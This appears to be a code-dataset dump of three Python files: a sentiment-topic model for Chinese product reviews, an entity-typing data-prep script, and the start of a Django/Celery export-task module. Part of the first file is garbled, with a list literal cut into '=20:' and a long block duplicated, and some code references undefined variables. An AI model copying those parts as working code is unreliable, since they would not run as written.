vector\n## return np.sum(scipy.special.gammaln(alpha)) - scipy.special.gammaln(np.sum(alpha))\n## else:\n## # alpha is assumed to be a scalar\n## return K * scipy.special.gammaln(alpha) - scipy.special.gammaln(K*alpha)\n## \n## def loglikelihood(self):\n## n_docs=len(self.corpus)\n## lik = 0\n##\n## for z in range(self.T):\n## for s in range(self.S):\n## lik += self.log_multi_beta(self.topic_sel_word_count[z, s,:]+self.beta)\n## \n## lik -= self.T * self.S * self.log_multi_beta(self.beta, self.V)\n##\n## for m in range(n_docs):\n## for z in range(self.S):\n## lik += self.log_multi_beta(self.doc_sel_topic_count[m, z, :]+self.gamma_dl[m,:])\n## \n## lik += self.log_multi_beta(self.doc_sentiment_count[m,:]+self.alpha_lz)\n## \n## lik -= n_docs * self.S * self.log_multi_beta(self.gamma_dl)\n## lik -= n_docs * self.log_multi_beta(self.alpha_lz)\n## \n## return lik\n## \n## def perplexity(self):\n## score = np.exp(-self.loglikelihood()/self.wordOccurenceMatrix.sum())\n## return score\n \n\n\n\n\n def get_top_sentiment_topic(self, topnums):\n '''每一个sentiment下的top-topic\n 可以利用prettyTable进行显示\n '''\n table=PrettyTable()\n\n with open('C:/Users/Administrator/Desktop/data/评论/top_sentiment_topic_word.txt', 'w',encoding='utf-8') as f:\n for i in range(0, self.T):\n for j in range(self.S):\n top_words = np.argsort(self.topic_sel_word[i,j :]).tolist()[:topnums]\n #print('输出的是每个topic的top_word的下标',top_words)\n print(top_words)\n top_word = [self.id2word[kk] for kk in top_words[0]]\n table.add_column('sentiment{0}and topic_{1}'.format(i,j),top_word)\n res = 'sentiment:{0},topic{1}: \\t {2} '.format(i,j,top_word)\n f.write(res + '\\n')\n f.close()\n print(table)\n # print(res)\n def get_sentiment_word(self,topnums):\n #得到每个sentiment下的word\n table=PrettyTable()\n with open('C:/Users/Administrator/Desktop/data/评论/top_sentiment_word','w',encoding='utf-8') as f:\n for i in range(self.S):\n top_words=np.argsort(self.sentiment_word_count[i,:]).tolist()[:topnums]\n #print(top_words)\n 
top_word=[self.id2word[j] for j in top_words]\n table.add_column('sentiment_{0}'.format(i),top_word)\n res='sentiment:{0} has topic_word \\t {1}'.format(i,top_word)\n f.write(res)\n print(table)\n\n def get_wordsentiment(self,sentiment_index,topnum=20):\n '''\n 得到给定一个情感下的每个主题的词汇,以及概率\n 只输出其中三个topic/的topnum的词汇\n sentiment_word\n 利用\n :return:\n '''\n print('显示sentiment_index={0}下的3个主题的关键词汇'.format(sentiment_index))\n table=PrettyTable()\n word_list=[]\n for i in range(3):\n values_sentiment_topic=self.sentiment_topic_word[sentiment_index,i,:]\n max_list=np.argsort(values_sentiment_topic,).tolist()[-topnum:]\n ui=[]\n for id in max_list:\n ui.append((self.id2word[id],values_sentiment_topic[id]))\n #print(ui)\n word_list.append(ui)\n table.add_column('topic_{0}'.format(i),top_word)\n return word_list\n\n \n \n\n def get_word_sentiment0(self,seta):\n '''\n 得到每个词语的情感极性\n :return:self.word_sentiment_vocabulary\n '''\n # 主要使用sentiment-topic-word\n print('开始求解sentiment_word_list')\n sentiment_word_list={}\n word_sentiment_vocabulary={}\n for i in range(self.V):\n values=self.sentiment_topic_word[:,:,i]\n \n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[self.id2word[i]]=(max_index,max_list[max_index])\n if max_list[max_index] >=seta :\n if max_index not in sentiment_word_list.keys():\n sentiment_word_list[max_index]=[]\n sentiment_word_list[max_index].append([self.id2word[i],max_list[max_index]])\n else:\n continue\n self.sentiment_word_list=sentiment_word_list\n self.word_sentiment_vocabulary=word_sentiment_vocabulary\n print('得到所有词汇利用主题模型得到的情感极性')\n print(len(self.sentiment_word_list[0])+len(self.sentiment_word_list[1])+\n len(self.sentiment_word_list[2]))\n return\n \n def get_topic_word(self, topnums):\n '''得到每个topic下的top-word'''\n\n table=PrettyTable()\n with open('C:/Users/Administrator/Desktop/data/评论/top_topic_word_sel','w',encoding='utf-8') as f:\n for i in range(self.T):\n top_words=np.argsort(self.topic_word_count[i,:]).tolist()[:topnums]\n print(top_words)\n top_word=[self.id2word[j] for j in top_words]\n table.add_column('topic_{0}'.format(i),top_word)\n res='topic:{0} has topic_word \\t {1}'.format(i,top_word)\n f.write(res)\n print(table)\n\n\n def pingu(self,emplsion,type):\n '''\n :param 使用topic coherence 对模型进行评价 umass metric ----score d(j)-表示语料库中包含词汇j的个数 d(i,j)表示词汇i和j共同出现的词汇、\n 其中词汇i以及j取自同一个情感标签\n :return:topic coherence\n '''\n coherence_umass=[]\n for i in range(self.S):\n word_list=[word_par[0] for word_par in self.sentiment_word_list[i]]\n coherence_umass.append(sum([self._scoreumass(i,j,emplsion) for i in word_list for j in word_list] ))\n self.coherence=sum(coherence_umass)\n print('umass_metric 下的topic coherence:{0}'.format(self.coherence ))\n return self.coherence\n\n\n def _scoreumass(self,i,j,emplsion):\n '''\n :param i: 词汇i\n :param j: 词汇j\n :param emplsion:\n :return: score\n '''\n count_j=0\n count_ij=0\n for doc in self.corpus:\n if j in doc:\n count_j+=1\n if j in doc and i in doc:\n count_ij+=1\n score =np.log2((count_ij+emplsion)/count_j)\n return score\n\n \n \n def print_doc_topic_word(self, doc_id, topic_list, word_nums=20):\n all_num = len(topic_list)\n table = PrettyTable()\n for i in topic_list:\n topword = np.argsort(self.topic_word[i, :])[:word_nums]\n table.add_column(i, [self.id2word[jj] for jj in topword])\n print(table)\n\n # 打印出来该文档上的主题分布以及在每个主题上面的个数的图形\n doc_topic_count = 
self.doc_topic_count[doc_id, :]\n sns.stripplot(x=list(range(0, all_num - 1)), y=doc_topic_count)\n for i in topic_list:\n sns.scatterplot(x=range(0, self.V - 1), y=self.topic_word[i, :])\n plt.show()\n sns.countplot(x=range(0, self.V - 1), hue=self.topic_word[i, :])\n plt.show()\n\ndef get_result(k,comment_train,sentiment_dict):\n M = ldamodel_sent(k, 4,0.01, 0.01, 0.01, comment_train, len(comment_train), 200, sentiment_dict)\n M.createdictionary()\n M.initial()\n start=time.time()\n M.gibbssampling()\n M.get_word_sentiment0(seta=0.01)\n M.pingu(emplsion=0.000001,type='umass_metric')\n end = time.time()\n print('gibbssampling stage use {0} second'.format(end - start))\n print(k,'完成')\n return M.coherence\n\n\nif __name__ == '__main__':\n path1='C:/Users/Administrator/Desktop/data/corpus/handle_corpus_train.txt'\n print('开始加载数据')\n da=open(path1,encoding='utf-8').read()\n da1=da.lstrip('\\ufeff')\n data=json.loads(da1)\n corpus_total=data['正面']+data['反面']\n \n \n \n \n sentiment_path='C:/Users/Administrator/Desktop/data/corpus/sentiment_corpus_train.txt'\n se = open(sentiment_path, encoding='utf-8').read()\n se = se.lstrip('\\ufeff')\n sentiment_dict= json.loads(se)\n print('水杯评论加载完毕')\n \n corpus_cup=[]\n for doc in corpus_total:\n if len(doc) !=0:\n corpus_cup.append(doc)\n #comment_train, comment_test = train_test_split(corpus, test_size=0)\n comment_train=corpus_cup\n # cut_corpus是cut_comment\n #topic_list=[10,50,70,100]\n result=[]\n P = ldamodel_sent(5, 4, 0.01, 0.01, 0.01, comment_train, len(comment_train), 40, sentiment_dict)\n P.createdictionary()\n print('开始初始化')\n P.initial()\n print('初始化阶段的doc_sentiment_count')\n print(P.doc_sentiment_count)\n print(P.doc_count)\n start=time.time()\n P.gibbssampling()\n\n\n\n \n## from scipy.cluster.hierarchy import linkage, dendrogram, fcluster\n## import scipy.cluster.hierarchy as sch\n## from sklearn.decomposition import PCA\n## pca=PCA()\n## x=M.topic_w\n## x_new=pca.fit_transform(x)\n## disMat = sch.distance.pdist(x_new,'euclidean') \n## Z = linkage(disMat, method='ward')\n## P=sch.dendrogram(Z)\n## plt.title('Dendrogram for the Agglomerative Clustering')\n## plt.xlabel('sample_index')\n## plt.ylabel('distance')\n## plt.show()\n##\n## \n## labels_1 = fcluster(Z, t=1, criterion='inconsistent')\n## mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '=20:\n test[i]=doc\n #获得上面test中10则评论所对应的文档{-}情感分布\n \n ds=M.doc_sel\n test_dc=np.zeros((10,4))\n i=0\n for doc_id,doc in test.items():\n test_dc[i,:]=ds[doc_id,:]\n i+=1\n if i>=10:\n break\n \n \n\n #最后得到word-sentiment-vocabulary\n word_sentiment_vocabulary={}\n for i in range(p):\n values=stw_new[:,:,i]\n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[id2word[i]]=(max_index,max_list[max_index])\n\n #情感得分的计算\n\n \n sentence=set()\n for doc in corpus_cup:\n sentence.add(' '.join(doc))\n sentence=list(sentence)\n id2word=corpora.Dictionary(corpus_cup)\n word2id=id2word.token2id\n corpus = [id2word.doc2bow(text) for text in corpus0]\n model=models.TfidfModel(corpus,id2word=id2word)\n weight_corpus=model[corpus]\n\n def get_sentiment_score(pinglun,pinglun_index):\n jx_list=[]\n wordid_list=[]\n power=[]\n for word in pinglun :\n id_word=word2id[word]\n jx,par_jx=word_sentiment_vocabulary[word]\n if jx==0:\n power.append(1)\n elif jx==3:\n power.append(3)\n else:\n power.append(4)\n jx_list.append(jx)\n wordid_list.append(id_word)\n 
score=sum([power[i]*jx_list[i]*weight_corpus[pinglun_index][wordid_list[i]] for i in range(len(pinglun))])\n return score\n\n #按照店铺整理数据\n path_info='C:/Users/Administrator/Desktop/data/评论/product_info_cup_before.csv'\n info_dianpu=pd.read_csv(path_info,engine='python',encoding='utf-8')\n\n ii=info_dianpu['shop_id'].value_counts()\n\n dianpu_info={}\n count_ii=ii.head(n=10)\n for i in range(len(count_ii)):\n product_id=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['product_id'].values.tolist()\n shop_name=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['shop_name'].unique()[0]\n if shop_name not in dianpu_info.keys():\n dianpu_info[shop_name]=[]\n dianpu_info[shop_name].extend(product_id)\n\n path='C:/Users/Administrator/Desktop/data/评论/comment_info_cup_final.csv'\n df_data=pd.read_csv(path,engine='python')\n oo=df_data['referenceId'].value_counts()\n pp=oo[oo>=300].index.tolist()\n corpus_dianpu={}\n for dianpu,product_id_list in dianpu_info.items():\n for product_id in product_id_list:\n if product_id in pp:\n ui = df_data[df_data['referenceId'] == product_id]['comment'].values.tolist()\n else:\n continue\n if dianpu not in corpus_dianpu.keys():\n corpus_dianpu[dianpu]=[]\n corpus_dianpu[dianpu].append(ui)\n\n\n from scipy.cluster.hierarchy import linkage, dendrogram, fcluster\n import scipy.cluster.hierarchy as sch\n from sklearn.decomposition import PCA\n pca=PCA()\n x=new_twc\n x_new=pca.fit_transform(x)\n disMat = sch.distance.pdist(x_new,'euclidean') \n Z = linkage(disMat, method='ward')\n P=sch.dendrogram(Z)\n plt.title('Dendrogram for the Agglomerative Clustering')\n plt.xlabel('sample_index')\n plt.ylabel('distance')\n plt.show()\n\n \n labels_1 = fcluster(Z, t=1, criterion='inconsistent')\n## mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '=20:\n test[i]=doc\n doc_sel=np.zeros((M.D,4))\n for i in range(M.D):\n for j in range(M.S):\n doc_sel[i, j] = (M.doc_sentiment_count[i, j] + 0.01)/(M.doc_count[i] +M.S * 0.01)\n ds=M.doc_sel\n test_dc=np.zeros((10,4))\n i=0\n for doc_id,doc in test.items():\n test_dc[i,:]=ds[doc_id,:]\n i+=1\n if i>=10:\n break\n \n \n #最后得到word-sentiment-vocabulary\n word_sentiment_vocabulary={}\n for i in range(p):\n values=stw_new[:,:,i]\n # 获取到了每一个主题下每一个词汇的值,根据其最大值所在位置,找到该所所在的情感\n m_index=np.argmax(values,axis=1)\n max_list=np.array([values[ii ,m_index[ii]] for ii in range(4)])\n max_index=np.argmax(max_list)\n word_sentiment_vocabulary[id2word[i]]=(max_index,max_list[max_index])\n\n #情感得分的计算\n\n \n sentence=set()\n for doc in corpus_cup:\n sentence.add(' '.join(doc))\n sentence=list(sentence)\n id2word=corpora.Dictionary(corpus_cup)\n word2id=id2word.token2id\n corpus = [id2word.doc2bow(text) for text in corpus0]\n model=models.TfidfModel(corpus,id2word=id2word)\n weight_corpus=model[corpus]\n\n def get_sentiment_score(pinglun,pinglun_index):\n jx_list=[]\n wordid_list=[]\n power=[]\n for word in pinglun :\n id_word=word2id[word]\n jx,par_jx=word_sentiment_vocabulary[word]\n if jx==0:\n power.append(1)\n elif jx==3:\n power.append(3)\n else:\n power.append(4)\n jx_list.append(jx)\n wordid_list.append(id_word)\n score=sum([power[i]*jx_list[i]*weight_corpus[pinglun_index][wordid_list[i]] for i in range(len(pinglun))])\n return score\n\n #按照店铺整理数据\n path_info='C:/Users/Administrator/Desktop/data/评论/product_info_cup_before.csv'\n info_dianpu=pd.read_csv(path_info,engine='python',encoding='utf-8')\n\n ii=info_dianpu['shop_id'].value_counts()\n\n dianpu_info={}\n count_ii=ii.head(n=10)\n for i in range(len(count_ii)):\n 
product_id=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['product_id'].values.tolist()\n shop_name=info_dianpu[info_dianpu['shop_id']==count_ii.index[i]]['shop_name'].unique()[0]\n if shop_name not in dianpu_info.keys():\n dianpu_info[shop_name]=[]\n dianpu_info[shop_name].extend(product_id)\n\n path='C:/Users/Administrator/Desktop/data/评论/comment_info_cup_final.csv'\n df_data=pd.read_csv(path,engine='python')\n oo=df_data['referenceId'].value_counts()\n pp=oo[oo>=300].index.tolist()\n corpus_dianpu={}\n for dianpu,product_id_list in dianpu_info.items():\n for product_id in product_id_list:\n if product_id in pp:\n ui = df_data[df_data['referenceId'] == product_id]['comment'].values.tolist()\n else:\n continue\n if dianpu not in corpus_dianpu.keys():\n corpus_dianpu[dianpu]=[]\n corpus_dianpu[dianpu].append(ui)\n \n", "sub_path": "论文/ldamodel_sent.py", "file_name": "ldamodel_sent.py", "file_ext": "py", "file_size_in_byte": 37430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "numpy.random.dirichlet", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 161, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 162, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 164, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 172, "usage_type": "call"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 176, "usage_type": "attribute"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 177, "usage_type": "attribute"}, {"api_name": 
"numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 355, "usage_type": "call"}, {"api_name": "random.random", "line_number": 376, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 384, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 385, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 436, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 451, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 472, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 499, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 558, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 565, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 576, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 576, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 578, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 578, "usage_type": "name"}, {"api_name": "time.time", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 599, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 608, "usage_type": "call"}, {"api_name": "time.time", "line_number": 627, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 718, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 735, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 745, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 745, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 771, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 785, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 803, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy.distance.pdist", "line_number": 806, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy.distance", "line_number": 806, "usage_type": "attribute"}, {"api_name": "scipy.cluster.hierarchy", "line_number": 806, "usage_type": "name"}, {"api_name": "scipy.cluster.hierarchy.linkage", "line_number": 807, "usage_type": "call"}, {"api_name": 
"scipy.cluster.hierarchy.dendrogram", "line_number": 808, "usage_type": "call"}, {"api_name": "scipy.cluster.hierarchy", "line_number": 808, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 809, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 809, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 811, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 811, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 812, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 812, "usage_type": "name"}, {"api_name": "scipy.cluster.hierarchy.fcluster", "line_number": 815, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 821, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 826, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 834, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 834, "usage_type": "name"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 839, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 852, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 860, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 867, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 880, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 899, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 900, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 901, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 911, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 911, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 937, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 951, "usage_type": "call"}]}
+{"seq_id": "246328843", "text": "import json\r\n\r\nimport time\r\nimport argparse\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef prepare_train_data(file_input='./data/crowd/train.json', file_output='./data/processed/train.txt'):\r\n '''\r\n @param file_input (str): input filename\r\n @param file_output (str): output text file, model inputs\r\n '''\r\n f_in = open(file_input, 'r', encoding='utf-8')\r\n f_out = open(file_output, 'w', encoding='utf-8')\r\n sentence_left = []\r\n mention = []\r\n sentence_right = []\r\n text_output = []\r\n for i, line in tqdm(enumerate(f_in)):\r\n x = json.loads(line)\r\n sentence = ''\r\n y_list = x.get('y_str', None)\r\n sentence_left = x.get('left_context_token', None)\r\n mention = x.get('mention_span', None)\r\n sentence_right = x.get('right_context_token', None)\r\n if y_list is not None:\r\n for word in y_list:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence = sentence + '\\t'\r\n for word in sentence_left:\r\n sentence += word + ' '\r\n sentence += mention\r\n for word in sentence_right:\r\n sentence += word + ' '\r\n sentence += '[SEP] '\r\n sentence += mention + '\\n'\r\n text_output.append(sentence)\r\n\r\n for line in text_output:\r\n f_out.writelines(line)\r\n f_in.close()\r\n f_out.close()\r\n\r\n\r\n# create 6 different patterns of masked data\r\ndef prepare_masked_data(file_input='./data/crowd/train.json', file_output='./data/processed/train.txt'):\r\n '''\r\n @param file_input (str): input filename\r\n @param file_output (str): output text file, model inputs\r\n '''\r\n\r\n f_in = open(file_input, 'r', encoding='utf-8')\r\n sentence_left = []\r\n mention = []\r\n sentence_right = []\r\n text_output = []\r\n patterns = [\r\n 'and any other [MASK] ',\r\n # 'and some other [MASK] ',\r\n # '[MASK] such as ',\r\n # 'such [MASK] as ',\r\n # '[MASK] including ',\r\n # '[MASK] especially '\r\n ]\r\n f_out = []\r\n iter = len(patterns)\r\n for i in range(iter):\r\n f_out.append(open(file_output + '.' 
+ 'pattern_' + str(i), 'w', encoding='utf-8'))\r\n\r\n for i, line in tqdm(enumerate(f_in)):\r\n x = json.loads(line)\r\n y_list = x.get('y_str', None)\r\n sentence_left = x.get('left_context_token', None)\r\n mention = x.get('mention_span', None)\r\n sentence_right = x.get('right_context_token', None)\r\n # write\r\n for p in range(iter):\r\n sentence = ''\r\n if y_list is not None:\r\n for word in y_list:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence = sentence + '\\t'\r\n for word in sentence_left:\r\n sentence += word + ' '\r\n if p == 0 or p == 1:\r\n sentence += mention + ' '\r\n sentence += patterns[p]\r\n else:\r\n sentence += patterns[p]\r\n sentence += mention + ' '\r\n for word in sentence_right:\r\n sentence += word + ' '\r\n sentence = sentence[:-1]\r\n sentence += '\\n'\r\n f_out[p].writelines(sentence)\r\n\r\n for i in range(iter):\r\n f_out[i].close()\r\n f_in.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Arguments for preparing data.')\r\n parser.add_argument('-i', type=str, default='./data/distant.json', help='input file')\r\n parser.add_argument('-o', type=str, default='./data/train_distant.txt', help='output file')\r\n parser.add_argument('-m', type=int, default=0,\r\n help='generation mode: 0 - for training data; 1 - for masked training data')\r\n args = parser.parse_args()\r\n print('Reformatting data...')\r\n start = time.time()\r\n if args.m != '':\r\n if args.m == 0:\r\n prepare_train_data(args.i, args.o)\r\n elif args.m == 1:\r\n prepare_masked_data(args.i, args.o)\r\n else:\r\n print('Arg error.')\r\n else:\r\n print('Arg error.')\r\n\r\n # debug\r\n # prepare_data('./data/crowd/dev.json', './data/processed/dev.txt')\r\n # prepare_masked_data('./data/crowd/dev.json', './data/processed/dev.txt')\r\n\r\n end = time.time()\r\n print('Loading finished:\\t', end - start)", "sub_path": "examples/prepare_data.py", "file_name": "prepare_data.py", "file_ext": "py", "file_size_in_byte": 4421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tqdm.tqdm", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}]}
+{"seq_id": "253244507", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport cPickle\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db import DatabaseError\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.utils import timezone\n\nfrom celery import Task\nfrom celery.utils.log import get_task_logger\n\nfrom jobs.presets import TagParser\nfrom utils import (\n garmin, kml, osmand, osmconf, osmparse, overpass, pbf, shp, thematic_shp\n)\n\n# Get an instance of a logger\nlogger = get_task_logger(__name__)\n\n\n# ExportTask abstract base class and subclasses.\n\nclass ExportTask(Task):\n \"\"\"\n Abstract base class for export tasks.\n \"\"\"\n\n # whether to abort the whole run if this task fails.\n abort_on_error = False\n\n class Meta:\n abstract = True\n\n def on_success(self, retval, task_id, args, kwargs):\n \"\"\"\n Update the successfuly completed task as follows:\n\n 1. update the time the task completed\n 2. caclulate the size of the output file\n 3. calculate the download path of the export\n 4. create the export download directory\n 5. copy the export file to the download directory\n 6. create the export task result\n 7. update the export task status and save it\n \"\"\"\n from tasks.models import ExportTask, ExportTaskResult\n # update the task\n finished = timezone.now()\n task = ExportTask.objects.get(celery_uid=task_id)\n task.finished_at = finished\n # get the output\n output_url = retval['result']\n stat = os.stat(output_url)\n size = stat.st_size / 1024 / 1024.00\n # construct the download_path\n download_root = settings.EXPORT_DOWNLOAD_ROOT\n parts = output_url.split('/')\n filename = parts[-1]\n run_uid = parts[-2]\n run_dir = '{0}{1}'.format(download_root, run_uid)\n download_path = '{0}{1}/{2}'.format(download_root, run_uid, filename)\n try:\n if not os.path.exists(run_dir):\n os.makedirs(run_dir)\n # don't copy raw overpass data\n if (task.name != 'OverpassQuery'):\n shutil.copy(output_url, download_path)\n except IOError as e:\n logger.error('Error copying output file to: {0}'.format(download_path))\n # construct the download url\n download_media_root = settings.EXPORT_MEDIA_ROOT\n download_url = '{0}{1}/{2}'.format(download_media_root, run_uid, filename)\n # save the task and task result\n result = ExportTaskResult(\n task=task,\n filename=filename,\n size=size,\n download_url=download_url\n )\n result.save()\n task.status = 'SUCCESS'\n task.save()\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n \"\"\"\n Update the failed task as follows:\n\n 1. pull out the ExportTask\n 2. update the task status and finish time\n 3. create an export task exception\n 4. save the export task with the task exception\n 5. 
run ExportTaskErrorHandler if the run should be aborted\n - this is only for initial tasks on which subsequent export tasks depend\n \"\"\"\n from tasks.models import ExportTask, ExportTaskException, ExportRun\n logger.debug('Task name: {0} failed, {1}'.format(self.name, einfo))\n task = ExportTask.objects.get(celery_uid=task_id)\n task.status = 'FAILED'\n task.finished_at = timezone.now()\n task.save()\n exception = cPickle.dumps(einfo)\n ete = ExportTaskException(task=task, exception=exception)\n ete.save()\n if self.abort_on_error:\n run = ExportRun.objects.get(tasks__celery_uid=task_id)\n run.status = 'FAILED'\n run.finished_at = timezone.now()\n run.save()\n error_handler = ExportTaskErrorHandler()\n # run error handler\n stage_dir = kwargs['stage_dir']\n error_handler.si(run_uid=str(run.uid), task_id=task_id, stage_dir=stage_dir).delay()\n\n def after_return(self, *args, **kwargs):\n logger.debug('Task returned: {0}'.format(self.request))\n\n def update_task_state(self, run_uid=None, name=None):\n \"\"\"\n Update the task state and celery task uid.\n Can use the celery uid for 